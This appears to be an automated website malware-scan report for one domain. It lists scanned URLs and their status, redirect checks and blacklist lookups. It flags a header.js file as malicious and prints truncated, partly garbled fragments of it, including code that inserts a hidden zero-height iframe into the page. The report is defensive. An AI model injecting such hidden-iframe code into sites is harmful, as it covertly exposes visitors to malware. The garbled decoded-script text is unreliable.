Scanned pages/files
Request | Server response | Status |
http://yeppoy.com/ | 200 OK Content-Length: 6498 Content-Type: text/html | clean |
http://yeppoy.com/header.js | 200 OK Content-Length: 8578 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function writeHeader() { writeHeader(false); }
function writeHeader(virtuozo) { document.write('<a class="company-logo" href="http://www.parallels.com">Parallels</a><div class="header-area"><h1><a class="product-logo" href="http://www.parallels.com/plesk/" title="Parallels Plesk Panel">Parallels Plesk Panel</a></h1><span class="header-text"><a class="top-copyright" href="http://www.parallels.com">© 1999-2009, Parallels< if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://yeppoy.com/test/asp/test_mysql.asp | 401 Unauthorized Content-Length: 6307 Content-Type: text/html | clean |
http://yeppoy.com/test404page.js | 404 Not Found Content-Length: 5180 Content-Type: text/html | clean |
http://yeppoy.com/test/aspnet/test.aspx | 401 Unauthorized Content-Length: 6303 Content-Type: text/html | clean |
http://yeppoy.com/test/php/test.php | 401 Unauthorized Content-Length: 6295 Content-Type: text/html | clean |
http://yeppoy.com/test/coldfusion/test.cfm | 401 Unauthorized Content-Length: 6295 Content-Type: text/html | clean |
http://yeppoy.com/test/perl/test.pl | 401 Unauthorized Content-Length: 6295 Content-Type: text/html | clean |
http://yeppoy.com/test/python/test.py | 401 Unauthorized Content-Length: 6285 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yeppoy.com
Result:
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2015 16:30:13 GMT
Accept-Ranges: bytes
ETag: "9835d786d95dcc1:0"
Server: Microsoft-IIS/7.0
Content-Length: 6498
Content-Type: text/html
Last-Modified: Thu, 18 Aug 2011 19:03:33 GMT
X-Powered-By: ASP.NET
...6498 bytes of data.
GET / HTTP/1.1
Host: yeppoy.com
Result:
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2015 16:30:13 GMT
Accept-Ranges: bytes
ETag: "9835d786d95dcc1:0"
Server: Microsoft-IIS/7.0
Content-Length: 6498
Content-Type: text/html
Last-Modified: Thu, 18 Aug 2011 19:03:33 GMT
X-Powered-By: ASP.NET
...6498 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yeppoy.com
Referer: http://www.google.com/search?q=yeppoy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yeppoy.com
Referer: http://www.google.com/search?q=yeppoy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yeppoy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yeppoy.com/
Result: yeppoy.com is not infected or malware details are not published yet.
Result: yeppoy.com is not infected or malware details are not published yet.